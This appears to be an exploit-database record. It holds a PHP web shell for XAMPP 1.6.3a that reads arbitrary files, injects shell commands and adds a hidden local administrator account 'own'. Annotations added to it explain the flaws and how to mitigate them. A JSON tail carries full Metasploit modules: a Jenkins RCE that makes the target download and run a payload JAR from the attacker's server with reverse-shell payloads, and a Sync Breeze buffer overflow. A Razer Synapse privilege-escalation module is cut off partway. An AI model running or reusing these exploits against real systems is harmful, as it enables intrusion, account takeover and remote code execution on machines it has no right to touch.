XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
2007-08-27T00:00:00
ID 1337DAY-ID-7722 Type zdt Reporter Inphex Modified 2007-08-27T00:00:00
Description
Exploit for unknown platform in category local exploits
===========================================================
XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
===========================================================
<?php
//Inphex
//
// Reviewer summary (defensive): this is an unauthenticated, web-reachable PHP
// script. Once written into a served htdocs directory, any HTTP client that can
// reach it can (a) list directories, (b) read arbitrary files, (c) run a shell
// command built from an unescaped query parameter, and (d) create a local
// administrator account. Everything executes with the rights of the Apache
// worker process, which is why the author's precondition below (Apache running
// as a privileged account) matters.
//
// Mitigations: run Apache as a dedicated low-privilege service account, keep
// htdocs non-writable by the web server, and block exec/shell_exec/passthru via
// the php.ini `disable_functions` directive. Detection: the web server process
// spawning cmd.exe/net.exe, and unexpected local account creation or
// Administrators-group membership changes (Windows Security events 4720/4732).
//
//htdocs must be accessible and writable, Apache must have been run as root.
//to add a user open like this : script.php?qQx
// Author's sample output below: a listing of an administrator's profile
// directory, shown as proof that the web server can read it.
// Directory of C:\Documents and Settings\Admin
//27.08.2007 16:36 <DIR> .
//27.08.2007 16:36 <DIR> ..
//14.08.2007 14:21 108 .asadminpass
//14.08.2007 14:21 772 .asadmintruststore
//14.08.2007 18:31 <DIR> .exe4j4
//26.08.2007 03:13 427 .glade2
//21.08.2007 16:35 <DIR> .msf3
//10.08.2007 04:41 <DIR> Contacts
//27.08.2007 01:44 129 default.pls
//27.08.2007 17:57 <DIR> Desktop
//23.08.2007 21:12 <DIR>
// Target directory comes straight from the query string and defaults to "./".
// $_GET['qmB'] is read without isset(), so a missing parameter raises a PHP
// notice before the loose == "" comparison falls back to the default.
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
// The opendir() result is never checked; an unreadable or nonexistent path
// yields false and the readdir() loop below then errors.
$qQd = opendir($qQa);
// qrF: arbitrary file read. The path is user-controlled and unvalidated; up to
// 50000 bytes are echoed raw (no HTML escaping), then the script exits.
if (isset($_GET['qrF']))
{
$qrX = fopen($_GET['qrF'],"r");
echo fread($qrX,50000);
exit;
// qQx: the privilege-escalation step. Creates local user "own" (password
// "own") and adds it to the "Administratoren" group — presumably a
// German-locale Windows, since the group name differs on other locales.
// Both net.exe invocations inherit the Apache process's privileges.
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administratoren own /add"); echo "User own -> full privileges successfully addet";exit;}
// Directory listing via the OS shell. $qQa is concatenated into the command
// line without escapeshellarg(), so the qmB parameter is also a command
// injection point; only the command's output is HTML-escaped, not the input.
echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "</textarea>";
// Second listing via PHP's directory functions, rendered as links: directories
// link back to qmB with a literal "/" appended after the encoded path
// (presumably so that $qQa.$qQr forms a valid path on the next request), and
// files link to the qrF reader above. Link text is HTML-escaped.
while (false !== ($qQr = readdir($qQd))){
switch(filetype($qQa.$qQr))
{
case "dir":
echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
break;
case "file":
echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
break;
}
}
?>
# 0day.today [2018-02-02] #
{"hash": "8711a57af986101b05a16503a91cad72808a1e7f1c68728822f0c01fbb692b22", "id": "1337DAY-ID-7722", "lastseen": "2018-02-02T03:08:53", "viewCount": 27, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8ea3cb8f764b9de8d6033617a44e5c24", "key": "href"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "modified"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "09e7a250020aed5a4bf5fca409a426c3", "key": "reporter"}, {"hash": "131ec84f77ffc5902fdfa7d92978c248", "key": "sourceData"}, {"hash": "f9e93a882890b1ec5dfb9d762f26250a", "key": "sourceHref"}, {"hash": "6bc57263910d725e82b00c21c97de392", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2018-02-02T03:08:53"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310122095", "OPENVAS:1361412562310120518", "OPENVAS:136141256231071958", "OPENVAS:136141256231071941"]}, {"type": "hackerone", "idList": ["H1:88904"]}, {"type": "jvn", "idList": ["JVN:23809730"]}, {"type": "nessus", "idList": ["ALA_ALAS-2011-1.NASL", "F5_BIGIP_SOL13114.NASL", "SUSE_11_3_APACHE2-110831.NASL", "SUSE_11_4_APACHE2-110831.NASL", "ALA_ALAS-2011-01.NASL", "ORACLELINUX_ELSA-2011-1245.NASL", "REDHAT-RHSA-2011-1294.NASL"]}, {"type": "amazon", "idList": ["ALAS-2011-001"]}, {"type": "seebug", "idList": ["SSV:72403"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126851", "PACKETSTORM:123527", "PACKETSTORM:122962"]}, {"type": "f5", "idList": ["F5:K13114"]}, {"type": "zdt", "idList": ["1337DAY-ID-21170"]}], 
"modified": "2018-02-02T03:08:53"}, "vulnersScore": -0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7722", "description": "Exploit for unknown platform in category local exploits", "title": "XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "5b7fbed85f2408c843b1a970b4982e762a0bc11cfa45c30d5f1832100819f8e8", "id": "1337DAY-ID-7722", "lastseen": "2016-04-20T00:12:39", "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T00:12:39"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca8b1d3988fada4b330a535abb225c6b", "key": "href"}, {"hash": "bcf0e7b22cfd54a56328b36414671037", "key": "sourceHref"}, {"hash": "09e7a250020aed5a4bf5fca409a426c3", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "modified"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "published"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6986ff1f2850fdcf1c5afd988672ac65", "key": "sourceData"}, {"hash": "6bc57263910d725e82b00c21c97de392", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7722", "description": "Exploit for unknown platform in category local exploits", "viewCount": 6, "title": "XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================\r\nXAMPP for Windows 1.6.3a Local Privilege Escalation Exploit\r\n===========================================================\r\n\r\n\r\n\r\n<?php\r\n//Inphex\r\n//htdocs must be accessable and 
writable,apache must have been ran by root.\r\n//to add a user open like this : script.php?qQx\r\n\r\n// Directory of C:\\Documents and Settings\\Admin\r\n\r\n//27.08.2007 16:36 <DIR> .\r\n//27.08.2007 16:36 <DIR> ..\r\n//14.08.2007 14:21 108 .asadminpass\r\n//14.08.2007 14:21 772 .asadmintruststore\r\n//14.08.2007 18:31 <DIR> .exe4j4\r\n//26.08.2007 03:13 427 .glade2\r\n//21.08.2007 16:35 <DIR> .msf3\r\n//10.08.2007 04:41 <DIR> Contacts\r\n//27.08.2007 01:44 129 default.pls\r\n//27.08.2007 17:57 <DIR> Desktop\r\n//23.08.2007 21:12 <DIR> \r\n$qQa = ($_GET['qmB'] == \"\")?\"./\":$_GET['qmB'];\r\n$qQd = opendir($qQa);\r\n\r\nif (isset($_GET['qrF']))\r\n{\r\n $qrX = fopen($_GET['qrF'],\"r\");\r\n echo fread($qrX,50000);\r\n exit;\r\n} elseif(isset($_GET['qQx'])) { exec(\"net user own own /add & net localgroup Administratoren own /add\"); echo \"User own -> full privileges successfully addet\";exit;}\r\necho \"<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>\";\r\necho htmlspecialchars(shell_exec(\"cd \".$qQa.\" & dir\"));\r\necho \"</textarea>\";\r\nwhile (false !== ($qQr = readdir($qQd))){\r\n\r\nswitch(filetype($qQa.$qQr))\r\n {\r\n case \"dir\":\r\n echo \"<a href=?qmB=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\"/>\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n case \"file\":\r\n echo \"<a href=?qrF=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\">\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n }\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2007-08-27T00:00:00", "references": [], "reporter": "Inphex", "modified": "2007-08-27T00:00:00", "href": "http://0day.today/exploit/description/7722"}, "lastseen": "2016-04-20T00:12:39", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================\r\nXAMPP for Windows 1.6.3a Local Privilege Escalation 
Exploit\r\n===========================================================\r\n\r\n\r\n\r\n<?php\r\n//Inphex\r\n//htdocs must be accessable and writable,apache must have been ran by root.\r\n//to add a user open like this : script.php?qQx\r\n\r\n// Directory of C:\\Documents and Settings\\Admin\r\n\r\n//27.08.2007 16:36 <DIR> .\r\n//27.08.2007 16:36 <DIR> ..\r\n//14.08.2007 14:21 108 .asadminpass\r\n//14.08.2007 14:21 772 .asadmintruststore\r\n//14.08.2007 18:31 <DIR> .exe4j4\r\n//26.08.2007 03:13 427 .glade2\r\n//21.08.2007 16:35 <DIR> .msf3\r\n//10.08.2007 04:41 <DIR> Contacts\r\n//27.08.2007 01:44 129 default.pls\r\n//27.08.2007 17:57 <DIR> Desktop\r\n//23.08.2007 21:12 <DIR> \r\n$qQa = ($_GET['qmB'] == \"\")?\"./\":$_GET['qmB'];\r\n$qQd = opendir($qQa);\r\n\r\nif (isset($_GET['qrF']))\r\n{\r\n $qrX = fopen($_GET['qrF'],\"r\");\r\n echo fread($qrX,50000);\r\n exit;\r\n} elseif(isset($_GET['qQx'])) { exec(\"net user own own /add & net localgroup Administratoren own /add\"); echo \"User own -> full privileges successfully addet\";exit;}\r\necho \"<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>\";\r\necho htmlspecialchars(shell_exec(\"cd \".$qQa.\" & dir\"));\r\necho \"</textarea>\";\r\nwhile (false !== ($qQr = readdir($qQd))){\r\n\r\nswitch(filetype($qQa.$qQr))\r\n {\r\n case \"dir\":\r\n echo \"<a href=?qmB=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\"/>\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n case \"file\":\r\n echo \"<a href=?qrF=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\">\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n }\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-02] #", "published": "2007-08-27T00:00:00", "references": [], "reporter": "Inphex", "modified": "2007-08-27T00:00:00", "href": "https://0day.today/exploit/description/7722"}
{"metasploit": [{"lastseen": "2019-11-20T16:26:17", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. When the \"Java Dropper\" target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE. When the \"Unix In-Memory\" target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution. The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n", "modified": "2019-05-30T05:06:10", "published": "2019-02-23T07:34:27", "id": "MSF:EXPLOIT/MULTI/HTTP/JENKINS_METAPROGRAMMING", "href": "", "type": "metasploit", "title": "Jenkins ACL Bypass and Metaprogramming RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins ACL Bypass and Metaprogramming RCE',\n 'Description' => %q{\n This module exploits a vulnerability in Jenkins dynamic routing to\n bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n download and execute a malicious JAR file.\n\n When the \"Java Dropper\" target is selected, the original entry point\n based on classLoader.parseClass is used, which requires the use of\n Groovy metaprogramming to achieve RCE.\n\n When the \"Unix In-Memory\" target is selected, a newer, higher-level,\n and more universal 
entry point based on GroovyShell.parse is used.\n This permits the use of in-memory arbitrary command execution.\n\n The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n on later versions of Jenkins.\n\n Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.\n },\n 'Author' => [\n 'Orange Tsai', # (@orange_8361) Discovery and PoC\n 'Mikhail Egorov', # (@0ang3el) Discovery and PoC\n 'George Noseevich', # (@webpentest) Discovery and PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-1000861'], # Orange Tsai\n ['CVE', '2019-1003000'], # Script Security\n ['CVE', '2019-1003001'], # Pipeline: Groovy\n ['CVE', '2019-1003002'], # Pipeline: Declarative\n ['CVE', '2019-1003005'], # Mikhail Egorov\n ['CVE', '2019-1003029'], # George Noseevich\n ['EDB', '46427'],\n ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],\n ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],\n ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],\n ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc'],\n ['URL', 'https://twitter.com/orange_8361/status/1126829648552312832'],\n ['URL', 'https://github.com/orangetw/awesome-jenkins-rce-2019']\n ],\n 'DisclosureDate' => '2019-01-08', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'java'],\n 'Arch' => [ARCH_CMD, ARCH_JAVA],\n 'Privileged' => false,\n 'Targets' => [\n ['Unix In-Memory',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :unix_memory,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}\n ],\n ['Java Dropper',\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Version' => Gem::Version.new('2.137'),\n 'Type' => :java_dropper,\n 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'}\n ]\n ],\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => 
[REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Stance' => Stance::Aggressive\n ))\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('URIPATH')\n end\n\n=begin\n http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]\n=end\n def check\n checkcode = CheckCode::Safe\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1('/search/index'),\n 'vars_get' => {'q' => 'a'}\n )\n\n unless res && (version = res.headers['X-Jenkins'])\n vprint_error('Jenkins version not detected')\n return CheckCode::Unknown\n end\n\n vprint_status(\"Jenkins #{version} detected\")\n checkcode = CheckCode::Detected\n\n if Gem::Version.new(version) > target['Version']\n vprint_error(\"Jenkins #{version} is not a supported target\")\n return CheckCode::Safe\n end\n\n vprint_good(\"Jenkins #{version} is a supported target\")\n checkcode = CheckCode::Appears\n\n if res.body.include?('Administrator')\n vprint_good('ACL bypass successful')\n checkcode = CheckCode::Vulnerable\n else\n vprint_error('ACL bypass unsuccessful')\n return CheckCode::Safe\n end\n\n checkcode\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n print_status(\"Configuring #{target.name} target\")\n\n vars_get = {'value' => go_go_gadget2}\n\n case target['Type']\n when :unix_memory\n vars_get = {'sandbox' => true}.merge(vars_get)\n when :java_dropper\n # NOTE: Ivy is using HTTP unconditionally, so we can't use HTTPS\n # HACK: Both HttpClient and HttpServer use datastore['SSL']\n ssl = datastore['SSL']\n datastore['SSL'] = false\n start_service('Path' => '/')\n datastore['SSL'] = ssl\n end\n\n print_status('Sending Jenkins and Groovy go-go-gadgets')\n 
send_request_cgi(\n 'method' => 'GET',\n 'uri' => go_go_gadget1,\n 'vars_get' => vars_get\n )\n end\n\n #\n # Exploit methods\n #\n\n=begin\n http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword\n ?apiUrl=http://169.254.169.254/%23\n &login=orange\n &password=tsai\n=end\n def go_go_gadget1(custom_uri = nil)\n # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username\n acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')\n\n return normalize_uri(acl_bypass, custom_uri) if custom_uri\n\n rce_base = normalize_uri(acl_bypass, 'descriptorByName')\n\n rce_uri =\n case target['Type']\n when :unix_memory\n '/org.jenkinsci.plugins.' \\\n 'scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'\n when :java_dropper\n '/org.jenkinsci.plugins.' \\\n 'workflow.cps.CpsFlowDefinition/checkScriptCompile'\n end\n\n normalize_uri(rce_base, rce_uri)\n end\n\n=begin\n http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile\n ?value=\n @GrabConfig(disableChecksums=true)%0a\n @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a\n @Grab(group='tw.orange', module='poc', version='1')%0a\n import Orange;\n=end\n def go_go_gadget2\n case target['Type']\n when :unix_memory\n payload_escaped = payload.encoded.gsub(\"'\", \"\\\\'\")\n\n (\n <<~EOF\n class #{app} {\n #{app}() {\n ['sh', '-c', '#{payload_escaped}'].execute()\n }\n }\n EOF\n ).strip\n when :java_dropper\n (\n <<~EOF\n @GrabConfig(disableChecksums=true)\n @GrabResolver('http://#{srvhost_addr}:#{srvport}')\n @Grab('#{vendor}:#{app}:#{version}')\n import #{app}\n EOF\n ).strip\n end\n end\n\n #\n # Payload methods\n #\n\n #\n # If you deviate from the following sequence, you will suffer!\n #\n # HEAD /path/to/pom.xml -> 404\n # HEAD /path/to/payload.jar -> 200\n # GET /path/to/payload.jar -> 200\n #\n def on_request_uri(cli, 
request)\n vprint_status(\"#{request.method} #{request.uri} requested\")\n\n unless %w[HEAD GET].include?(request.method)\n vprint_error(\"Ignoring #{request.method} request\")\n return\n end\n\n if request.method == 'HEAD'\n if request.uri != payload_uri\n vprint_error('Sending 404')\n return send_not_found(cli)\n end\n\n vprint_good('Sending 200')\n return send_response(cli, '')\n end\n\n if request.uri != payload_uri\n vprint_error('Sending bogus file')\n return send_response(cli, \"#{Faker::Hacker.say_something_smart}\\n\")\n end\n\n vprint_good('Sending payload JAR')\n send_response(\n cli,\n payload_jar,\n 'Content-Type' => 'application/java-archive'\n )\n\n # XXX: $HOME may not work in some cases\n register_dir_for_cleanup(\"$HOME/.groovy/grapes/#{vendor}\")\n end\n\n def payload_jar\n jar = payload.encoded_jar\n\n jar.add_file(\"#{app}.class\", exploit_class)\n jar.add_file(\n 'META-INF/services/org.codehaus.groovy.plugins.Runners',\n \"#{app}\\n\"\n )\n\n jar.pack\n end\n\n=begin javac Exploit.java\n import metasploit.Payload;\n\n public class Exploit {\n public Exploit(){\n try {\n Payload.main(null);\n } catch (Exception e) { }\n\n }\n }\n=end\n def exploit_class\n klass = Rex::Text.decode_base64(\n <<~EOF\n yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB\n AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq\n YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl\n Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n\n L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q\n twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL\n AAAA\n EOF\n )\n\n # Replace length-prefixed string \"Exploit\" with a random one\n klass.sub(/.Exploit/, \"#{[app.length].pack('C')}#{app}\")\n end\n\n #\n # Utility methods\n #\n\n def payload_uri\n \"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar\"\n end\n\n def vendor\n @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join\n end\n\n def app\n @app ||= 
Faker::App.name.split(/[^[:alpha:]]/).join\n end\n\n def version\n @version ||= Faker::App.semantic_version\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jenkins_metaprogramming.rb"}, {"lastseen": "2019-11-07T11:25:55", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.\n", "modified": "2018-01-23T22:34:49", "published": "2018-01-15T20:46:40", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/SYNCBREEZE_XML", "href": "", "type": "metasploit", "title": "Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',\n 'Description' => %q(\n This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16\n by using the import command option to import a specially crafted xml file.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira'\n ],\n 'References' =>\n [\n [ 'CVE', '2017-7310' ],\n [ 'EDB', '41773' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'DisablePayloadHandler' => 'true'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x01\\x02\\x0a\\x0b\\x0c\\x22\\x27\",\n 'StackAdjustment' => -3500\n },\n 'Targets' =>\n [\n ['Windows Universal', { 'Ret' => 0x10015FFE } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 29 2017',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 
'The file name.', 'msf.xml'])\n ])\n end\n\n def exploit\n jmpesp = \"\\x7A\\xB7\\x1B\\x65\" # JMP ESP QtGui4.dll\n esp = \"\\x8D\\x44\\x24\\x4C\" # LEA EAX, [ESP+76]\n jmp = \"\\xFF\\xE0\" # JMP ESP\n\n buffer = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\n<classify\\nname=\\'\"\n buffer << \"\\x90\" * 1536\n buffer << jmpesp\n buffer << \"\\x90\" * 18\n buffer << esp\n buffer << jmp\n buffer << \"\\x90\" * 68\n buffer << generate_seh_record(target.ret)\n buffer << \"\\x90\" * 10\n buffer << payload.encoded\n buffer << \"\\x90\" * 5000\n buffer << \"\\n</classify>\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(buffer)\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/syncbreeze_xml.rb"}, {"lastseen": "2019-12-03T02:38:03", "bulletinFamily": "exploit", "description": "A vulnerability exists in the latest version of Razer Synapse (v2.20.15.1104 as of the day of disclosure) which can be leveraged locally by a malicious application to elevate its privileges to those of NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver that passes a PID specified by the user to ZwOpenProcess. This can be issued by an application to open a handle to an arbitrary process with the necessary privileges to allocate, read and write memory in the specified process. This exploit leverages this vulnerability to open a handle to the winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by installing a hook to execute attacker controlled shellcode. This hook is then triggered on demand by calling user32!LockWorkStation(), resulting in the attacker's payload being executed with the privileges of the infected winlogon process. In order for the issued IOCTL to work, the RazerIngameEngine.exe process must not be running. 
This exploit will check if it is, and attempt to kill it as necessary. The vulnerable software can be found here: https://www.razerzone.com/synapse/. No Razer hardware needs to be connected in order to leverage this vulnerability. This exploit is not opsec-safe due to the user being logged out as part of the exploitation process.\n", "modified": "2018-10-28T00:54:14", "published": "2017-07-10T20:57:23", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/RAZER_ZWOPENPROCESS", "href": "", "type": "metasploit", "title": "Razer Synapse rzpnk.sys ZwOpenProcess", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/local/windows_kernel'\nrequire 'rex'\nrequire 'metasm'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Local::WindowsKernel\n include Msf::Post::Windows::Priv\n\n # the max size our hook can be, used before it's generated for the allocation\n HOOK_STUB_MAX_LENGTH = 256\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',\n 'Description' => %q{\n A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. 
This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.\n },\n 'Author' => 'Spencer McIntyre',\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2017-9769'],\n ['URL', 'https://warroom.securestate.com/cve-2017-9769/']\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested on (64 bits):\n # * Windows 7 SP1\n # * Windows 10.0.10586\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 20\n },\n 'DefaultTarget' => 0,\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 22 2017',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SERVICE_RESTARTS ],\n 'SideEffects' => [ SCREEN_EFFECTS ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n },\n ))\n end\n\n def check\n # Validate that the driver has been loaded and that\n # the version is the same as the one expected\n client.sys.config.getdrivers.each do |d|\n if d[:basename].downcase == 'rzpnk.sys'\n expected_checksum = 'b4598c05d5440250633e25933fff42b0'\n target_checksum = client.fs.file.md5(d[:filename])\n\n if expected_checksum == Rex::Text.to_hex(target_checksum, '')\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, 'Exploit not available on 
